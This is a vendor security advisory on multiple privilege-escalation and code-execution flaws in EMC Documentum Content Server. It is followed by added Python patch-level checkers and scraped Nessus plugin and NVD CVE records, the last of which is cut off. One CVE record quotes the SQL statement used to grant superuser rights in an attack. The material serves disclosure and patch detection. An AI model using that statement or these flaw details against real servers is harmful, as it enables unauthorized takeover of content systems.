-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities
EMC Identifier: ESA-2015-131
CVE Identifier: CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535, CVE-2015-4536
Severity Rating: CVSS v2 Base Score: See below for individual scores for each CVE
Affected products:
• EMC Documentum Content Server prior to 7.0
• EMC Documentum Content Server 7.0
• EMC Documentum Content Server 7.1
• EMC Documentum Content Server 7.2
Summary:
EMC Documentum Content Server contains multiple vulnerabilities that could be exploited by malicious users to compromise the Content Server in several ways.
Details:
EMC Documentum Content Server is susceptible to the following vulnerabilities:
1. Authenticated Content Server users with sysadmin privileges may potentially escalate their privileges to become a super-user due to improper authorization checks performed on subgroups that exist within the dm_superusers group and other privileged groups. This may potentially be exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server. The previous fix for CVE-2014-4622 was incomplete.
CVE ID: CVE-2015-4531
CVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)
2. Authenticated non-privileged Content Server users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This may potentially be exploited by a malicious, authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code. The previous fix for CVE-2014-2514 was incomplete.
CVE ID: CVE-2015-4532
CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)
3. Authenticated non-privileged Content Server users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This may potentially be exploited to perform unauthorized actions on Content Server. The previous fix for CVE-2014-2513 was incomplete.
CVE ID: CVE-2015-4533
CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)
4. Content Server delegates execution of business logic to an embedded Java application server called "Java Method Server" (JMS). JMS fails to properly validate digital signatures, leading to the possibility of arbitrary code execution on the Content Server. An attacker capable of crafting a digital signature for a query string without the method_verb parameter may be able to execute arbitrary code in Content Server in the JMS context, depending on the Java classes present in the classloader.
CVE ID: CVE-2015-4534
CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:P/I:C/A:C)
5. Content Server delegates execution of business logic to an embedded Java application server called "Java Method Server" (JMS). JMS logs login tickets in certain instances when the __debug_trace__ parameter is enabled. An attacker with access to, or capable of hijacking, Content Server logs may be able to obtain superuser tickets and privileges.
CVE ID: CVE-2015-4535
CVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:P/I:P/A:C)
6. When RPC tracing is enabled, obfuscated passwords of Content Server users with inline password authentication are posted to the log file in clear text. An attacker with access to Content Server log files can use the passwords to log in as the compromised user.
CVE ID: CVE-2015-4536
CVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)
Resolution:
The following versions contain the fixes for the vulnerabilities described in CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534 and CVE-2015-4535:
• EMC Documentum Content Server 6.7SP1P32 or later
• EMC Documentum Content Server 6.7SP2P25 or later
• EMC Documentum Content Server 7.0P19 or later
• EMC Documentum Content Server 7.1P16 or later
• EMC Documentum Content Server 7.2P02 or later
The following versions contain the fix for the vulnerability described in CVE-2015-4536:
• EMC Documentum Content Server 7.0P20 or later
• EMC Documentum Content Server 7.1P18 or later
• EMC Documentum Content Server 7.2P02 or later
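As an added example (not part of EMC's advisory), the two fixed-version lists above turned into a build check: it parses Content Server build strings such as 6.7SP1P32 and reports, per CVE group, whether an installed build is at or past the fixed patch level on its branch. The branch/patch reading of the SP and P suffixes and the sample inventory are assumptions.

```python
import re

# Fixed builds taken from the Resolution section of ESA-2015-131.
# Key: release branch; value: first patch level on that branch carrying the fix.
FIXES = {
    "CVE-2015-4531/4532/4533/4534/4535": {
        "6.7SP1": 32, "6.7SP2": 25, "7.0": 19, "7.1": 16, "7.2": 2,
    },
    "CVE-2015-4536": {
        "7.0": 20, "7.1": 18, "7.2": 2,
    },
}

# Build strings look like 6.7SP1P32, 7.0P19 or 7.2 (no patch suffix).
# Assumption: SP<n> names a service-pack branch and P<n> the patch level on it.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:SP(\d+))?(?:P(\d+))?$", re.IGNORECASE)


def parse_version(text):
    """Split a Content Server build string into (branch, patch), e.g. ('6.7SP1', 32)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Documentum version string: {text!r}")
    major, minor, sp, patch = m.groups()
    branch = f"{int(major)}.{int(minor)}" + (f"SP{int(sp)}" if sp else "")
    return branch, int(patch) if patch else 0


def fix_status(version):
    """Return {cve_group: 'fixed' | 'vulnerable' | 'no fix listed'} for one build."""
    branch, patch = parse_version(version)
    status = {}
    for group, table in FIXES.items():
        fix_patch = table.get(branch)
        if fix_patch is None:
            # Branch absent from the Resolution list (e.g. 6.7SP1 for CVE-2015-4536,
            # or an older 6.x release): the advisory names no fixed build for it,
            # so it must be treated as unfixed rather than silently skipped.
            status[group] = "no fix listed"
        elif patch >= fix_patch:
            status[group] = "fixed"
        else:
            status[group] = "vulnerable"
    return status


def needs_patch(version):
    """True when any CVE group in the advisory is unfixed on this build."""
    return any(s != "fixed" for s in fix_status(version).values())


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and builds are made up.
    inventory = {
        "cs-prod-01": "7.1P16",
        "cs-prod-02": "7.1P18",
        "cs-legacy": "6.7SP1P31",
        "cs-old": "6.6P10",
    }
    for host, build in inventory.items():
        flag = "PATCH" if needs_patch(build) else "ok"
        print(f"{host:<12} {build:<10} {flag:<6} {fix_status(build)}")
```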
EMC strongly recommends that all customers apply the patches at the earliest opportunity.
Link to remedies:
Registered EMC Online support customers can download software from https://emc.subscribenet.com/.
Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.
For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account both the base score and any relevant temporal and environmental scores that may affect the potential severity associated with a particular security vulnerability.
EMC Corporation distributes EMC Security Advisories in order to bring important security information to the attention of users of the affected EMC products. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC or its suppliers be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
EMC Product Security Response Center
security_alert@emc.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)
iEYEARECAAYFAlXR2/MACgkQtjd2rKp+ALyjggCcCHtFP+E8efdEpb3L3AbR4pWz
7DQAn3Om9XRWTq8PLNFiCl61ZC8gDHrr
=F2Hc
-----END PGP SIGNATURE-----
handling of subgroups in the 'dm_superusers'\n group and other privileged groups. A user with sysadmin\n privileges can escalate their privileges to super-user\n status. (CVE-2014-4622)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2014/Sep/att-92/ESA-2014-091.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:documentum_content_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"emc_documentum_content_server_installed.nbin\");\n script_require_keys(\"installed_sw/EMC Documentum Content Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"emc_documentum.inc\");\n\napp_name = DOC_APP_NAME;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nfixes = make_nested_list(\n make_list(\"7.1P08\"),\n make_list(\"7.0P15\" + DOC_HOTFIX),\n make_list(\"6.7SP2P17\", DOC_NO_MIN)\n);\n\ndocumentum_check_and_report(install:install, fixes:fixes, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T02:39:02", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization and does not properly restrict object types, which allows remote authenticated users to run save RPC commands with super-user privileges, and consequently execute arbitrary code, via unspecified vectors. 
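Both Nessus plugins above reduce to one decision: compare the installed Documentum version against a short fix list (7.0P20 / 7.1P18 / 7.2P02 for ESA-2015-131, 7.1P08 / 7.0P15 / 6.7SP2P17 for ESA-2014-091). The Python below is an added example written for this page, not Tenable's NASL or its `documentum_check_and_report` helper: it parses the `major.minor[SPn][Pn]` strings into tuples and compares per branch, assuming a plain "patch N or later on that branch is fixed" rule (the plugins' `DOC_HOTFIX` and `DOC_NO_MIN` modifiers are not reproduced). It also shows why naive string comparison misorders `7.0P9` against `7.0P20`, a classic source of scanner false negatives.

```python
import re

# Fix lists as they appear in the two Nessus plugins quoted above.
# The NASL helpers (DOC_HOTFIX, DOC_NO_MIN) are not reproduced; this example
# assumes plain "patch level N or later on that branch is fixed" semantics.
FIXES_ESA_2015_131 = ["7.0P20", "7.1P18", "7.2P02"]
FIXES_ESA_2014_091 = ["7.1P08", "7.0P15", "6.7SP2P17"]

# major.minor, optional service pack, optional patch: "6.7SP2P17", "7.2P02", "7.1"
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:SP(\d+))?(?:P(\d+))?$", re.IGNORECASE)


def parse_version(text):
    """'6.7SP2 P17' -> (6, 7, 2, 17); '7.2' -> (7, 2, 0, 0). Raises ValueError on junk."""
    m = _VERSION_RE.match(text.replace(" ", ""))
    if m is None:
        raise ValueError(f"unrecognised Documentum version string: {text!r}")
    return tuple(int(g) if g else 0 for g in m.groups())


def branch_of(version):
    """The branch a fix applies to: (major, minor, service pack)."""
    return version[:3]


def is_vulnerable(installed, fixes):
    """True if installed is below the fix for its branch, False if at or after it,
    None if no fix entry covers that branch (the plugin would not flag it at all)."""
    inst = parse_version(installed)
    for fix in fixes:
        f = parse_version(fix)
        if branch_of(f) == branch_of(inst):
            return inst < f
    return None


def lexicographic_is_older(installed, fix):
    """The wrong way: plain string comparison, which misorders P9 and P20."""
    return installed < fix


if __name__ == "__main__":
    for v in ["7.0P19", "7.0P20", "7.0P9", "7.2P01", "6.7SP1 P32"]:
        print(f"{v:12} ESA-2015-131 vulnerable: {is_vulnerable(v, FIXES_ESA_2015_131)}")
    print("string compare says 7.0P9 is older than 7.0P20:",
          lexicographic_is_older("7.0P9", "7.0P20"))
```

Treat a `None` result as "not assessed", not "safe": the NVD entries on this page give 6.7 SP1 and SP2 patch levels for the 2015 CVEs that the `_V7_0` plugin's fix list does not cover, so a 6.7 host passes this particular plugin silently.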
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2514.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4532", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2514", "CVE-2015-4532"], "modified": "2016-11-28T19:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4532", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4532", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-user privileges via a custom script. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2513.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4533", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2015-4533"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4533", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization for subgroups of privileged groups, which allows remote authenticated sysadmins to gain super-user privileges, and bypass intended restrictions on data access and server actions, via unspecified vectors. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-4622.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4531", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4622", "CVE-2015-4531"], "modified": "2016-11-28T19:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4531", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:07:36", "description": "EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization and does not properly restrict object types, which allows remote authenticated users to run save RPC commands with super-user privileges, and consequently execute arbitrary code, via unspecified vectors.", "cvss3": {}, "published": "2014-07-08T11:06:00", "type": "cve", "title": "CVE-2014-2514", "cwe": ["CWE-20"], "bulletinFamily": 
"NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2514"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2014-2514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2514", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:07:36", "description": "EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-user privileges via a custom script.", "cvss3": {}, "published": "2014-07-08T11:06:00", "type": "cve", "title": "CVE-2014-2513", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.2, "vectorString": 
"AV:N/AC:M/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513"], "modified": "2017-01-07T02:59:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2014-2513", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2513", "cvss": {"score": 8.2, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:P"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "Java Method Server (JMS) in EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 allows remote authenticated users to execute arbitrary code by forging a signature for a query string that lacks the method_verb parameter.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4534", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4534"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", 
"cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4534", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4534", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T10:10:52", "description": "EMC Documentum Content Server before 6.7 SP2 P17, 7.0 through P15, and 7.1 before P08 does not properly check authorization for subgroups of privileged groups, which allows remote authenticated sysadmins to gain super-user privileges, and bypass intended restrictions on data access and server actions, via unspecified vectors.", "cvss3": {}, "published": "2014-09-17T10:55:00", "type": "cve", "title": "CVE-2014-4622", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4622"], "modified": "2017-08-29T01:35:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.0", "cpe:/a:emc:documentum_content_server:6.6", "cpe:/a:emc:documentum_content_server:6.0", "cpe:/a:emc:documentum_content_server:6.5", "cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:6.7"], "id": "CVE-2014-4622", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4622", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:6.5:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.5:sp3:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:00", "description": "Java Method Server (JMS) in EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02, when __debug_trace__ is configured, allows remote authenticated users to gain super-user privileges by leveraging the ability to read a log file containing a login ticket.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4535", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4535"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.2", "cpe:/a:emc:documentum_content_server:7.1", 
"cpe:/a:emc:documentum_content_server:6.7", "cpe:/a:emc:documentum_content_server:7.0"], "id": "CVE-2015-4535", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4535", "cvss": {"score": 7.5, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:C"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:6.7:sp2:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T02:39:01", "description": "EMC Documentum Content Server before 7.0 P20, 7.1 before P18, and 7.2 before P02, when RPC tracing is configured, stores certain obfuscated password data in a log file, which allows remote authenticated users to obtain sensitive information by reading this file.", "cvss3": {}, "published": "2015-08-20T10:59:00", "type": "cve", "title": "CVE-2015-4536", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4536"], "modified": "2017-09-21T01:29:00", "cpe": ["cpe:/a:emc:documentum_content_server:7.1", "cpe:/a:emc:documentum_content_server:7.0", "cpe:/a:emc:documentum_content_server:7.2"], "id": "CVE-2015-4536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4536", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:emc:documentum_content_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:emc:documentum_content_server:7.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:emc:documentum_content_server:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:13:12", "description": "OpenText Documentum Content Server allows superuser access via sys_obj_save or save of a crafted object, followed by an unauthorized \"UPDATE dm_dbo.dm_user_s SET user_privileges=16\" command, aka an \"RPC save-commands\" attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4532.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-21T02:59:00", "type": "cve", "title": "CVE-2017-7220", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 